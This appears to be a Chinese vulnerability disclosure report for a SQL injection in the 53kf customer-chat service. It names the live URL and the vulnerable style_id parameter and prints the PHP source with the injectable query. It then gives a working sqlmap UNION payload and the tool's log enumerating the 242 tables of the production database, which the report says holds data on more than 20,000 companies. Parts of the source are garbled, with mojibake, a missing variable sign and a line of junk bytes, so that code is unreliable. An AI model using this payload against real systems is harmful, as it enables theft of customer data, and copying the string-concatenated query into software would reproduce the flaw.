### 简要描述:
53kf某处root权限SQL注入
### 详细说明:
漏洞url为http://www5.53kf.com/iframe_brief.php?style_id=106000198&language=cn
问题参数为style_id,数字型注入,支持union查询
[<img src="https://images.seebug.org/upload/201501/1922472181cdf8d920c1a0de8e755e8637ca01d6.jpg" alt="531.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/1922472181cdf8d920c1a0de8e755e8637ca01d6.jpg)
看看可以loadfile,以下是存在注入的这个php文件源码
<?php
define("IN_OK",true);
require_once('include/global.php');
$style_id = get_value("style_id");
$language = get_value("language");
$notes = "";
$sql = "select config_value from company_config where style_id=".$style_id." and config_id='company_notes' and company_id!=0";
$notes = db_query11($sql);
if($notes!="")
{
$notes = matchQQ($notes);
}
$tpl->assign("notes", $notes);
$tpl->display("iframe_brief.htm");
// æ¥æ¶$_GET[]çå¼
function get_value($get_name, $re="")
{
if(isset($_GET[$get_name]) && trim($_GET[$get_name])!="")
{
$re = filterSQL($_GET[$get_name]);
}
return $re;
}
// 解æQQ123456
function matchQQ($str)
{
global $language, $master_host;
title = "";
if($language=="cn")
{
$title = "ç¹å»è·æQQè";
}
else if($language=="tw")
{
$title = "é»æè·æQQè";
}
else if($language=="en")
{
$title = "Click to chat with me";
}
else
{
$title = "Click to chat with me";
}
$str = preg_replace("/qq([0-9]+)/i","<img border=\"0\" title=\"".$title."\" src=\"http://".$master_host."/img/qq.gif\" onclick=\"addQQ('$1')\" style=\"cursor:pointer\"/>",$str);
"&WGW&âG7G#°§Ð £ó
### 漏洞证明:
涉及到大量的数据,涉及到2W+的企业,看看表有多少吧
Place: GET
Parameter: style_id
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column (custom)
Payload: style_id=-5466 UNION ALL SELECT CONCAT(0x716c756e71,0x6b7852584141
4517753,0x71746f6a71)#&language=cn
---
[22:50:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[22:50:18] [INFO] fetching tables for database: 'talk'
[22:50:18] [INFO] the SQL query used returns 242 entries
[22:50:18] [INFO] starting 10 threads
Database: talk
[242 tables]
+--------------------------------+
| C3P0TestTable |
| identity |
| module |
| access |
| access_log |
| account_switch |
| agent_oper |
| agent_style_lock |
| area_kf |
| autoreply |
| block_user |
| chat_count |
| chat_count_201310111524 |
| chat_count_result |
| chat_nation |
| chat_search |
| chat_tables |
| chat_worker |
| company |
| company_ad |
| company_config |
| company_etel |
| company_style |
| company_tinet |
| company_tinet_cno |
| conf_ip1 |
| conf_ip1_old |
| conf_sync |
| config_id_remark |
| config_value_remark |
| counter |
| cus_bill |
| cus_group |
| cus_link |
| cus_mail |
| cus_sms |
| cus_theme |
| cus_user |
| cus_web_msg |
| customer |
| cyy |
| cyy_group |
| daemonlog_recv |
| daemonlog_send |
| disconnect_statistics |
| download_job |
| email |
| err_infos |
| err_infos_kf |
| etel_logo |
| face |
| file |
| identity_role_id |
| ill_words |
| image |
| imessage |
| inner_identity |
| kf_group |
| kf_group_newthing |
| kf_group_upload |
| kf_share |
| link |
| login_off |
| logo |
| logsql |
| mail_template |
| mailqueue |
| message |
| message_buffer |
| message_d1 |
| message_d10 |
| message_d11 |
| message_d12 |
| message_d13 |
| message_d14 |
| message_d15 |
| message_d16 |
| message_d17 |
| message_d18 |
| message_d19 |
| message_d2 |
| message_d20 |
| message_d21 |
| message_d22 |
| message_d23 |
| message_d24 |
| message_d25 |
| message_d26 |
| message_d27 |
| message_d28 |
| message_d29 |
| message_d3 |
| message_d30 |
| message_d31 |
| message_d32 |
| message_d33 |
| message_d34 |
| message_d35 |
| message_d36 |
| message_d37 |
| message_d38 |
| message_d39 |
| message_d4 |
| message_d40 |
| message_d41 |
| message_d42 |
| message_d43 |
| message_d44 |
| message_d45 |
| message_d46 |
| message_d47 |
| message_d48 |
| message_d49 |
| message_d5 |
| message_d50 |
| message_d51 |
| message_d52 |
| message_d53 |
| message_d6 |
| message_d7 |
| message_d8 |
| message_d9 |
| module_new |
| module_special |
| module_style_num_bak |
| msg_reply |
| operate_log |
| quality_tj |
| robot |
| robot_hot |
| robot_mem |
| room_message |
| sms_config |
| sms_lword |
| sph_counter |
| sql_sync |
| stat_keyword_month |
| stat_place |
| stat_search |
| stat_to |
| statistic |
| statistic_from |
| statistic_mobile |
| statistic_nation |
| statistic_net |
| statistic_place |
| sync_cus_user |
| sync_worker_stat |
| sys_notify |
| talk_evalu |
| talk_his |
| talk_his_buffer |
| talk_his_d1 |
| talk_his_d10 |
| talk_his_d11 |
| talk_his_d12 |
| talk_his_d13 |
| talk_his_d14 |
| talk_his_d15 |
| talk_his_d16 |
| talk_his_d17 |
| talk_his_d18 |
| talk_his_d19 |
| talk_his_d2 |
| talk_his_d20 |
| talk_his_d21 |
| talk_his_d22 |
| talk_his_d23 |
| talk_his_d24 |
| talk_his_d25 |
| talk_his_d26 |
| talk_his_d27 |
| talk_his_d28 |
| talk_his_d29 |
| talk_his_d3 |
| talk_his_d30 |
| talk_his_d31 |
| talk_his_d32 |
| talk_his_d33 |
| talk_his_d34 |
| talk_his_d35 |
| talk_his_d36 |
| talk_his_d37 |
| talk_his_d38 |
| talk_his_d39 |
| talk_his_d4 |
| talk_his_d40 |
| talk_his_d41 |
| talk_his_d42 |
| talk_his_d43 |
| talk_his_d44 |
| talk_his_d45 |
| talk_his_d46 |
| talk_his_d47 |
| talk_his_d48 |
| talk_his_d49 |
| talk_his_d5 |
| talk_his_d50 |
| talk_his_d51 |
| talk_his_d52 |
| talk_his_d53 |
| talk_his_d6 |
| talk_his_d7 |
| talk_his_d8 |
| talk_his_d9 |
| talk_his_delete |
| talk_his_temp |
| talk_id |
| talk_quality |
| talk_subject |
| talk_theme |
| talk_vote |
| talk_weixin |
| temp_download_2talk_his |
| temp_download_chat_nation |
| temp_download_chat_worker |
| temp_download_cus_user |
| temp_download_imessage |
| temp_download_message |
| temp_download_stat_place |
| temp_download_statistic |
| temp_download_statistic_from |
| temp_download_statistic_nation |
| temp_download_statistic_net |
| temp_download_statistic_place |
| temp_download_talk_his |
| temp_download_worker |
| v5_company_config |
| visitor_lnk |
| visitor_trace |
| visitor_trace_old0730 |
| wechat_guest |
| weixin_config |
| worker |
| worker_config |
| worker_group |
| worker_online_log |
| worker_online_log_detail |
| zsk_category |
| zsk_key |
| zsk_noanswer |
| zsk_question |
+--------------------------------+
暂无评论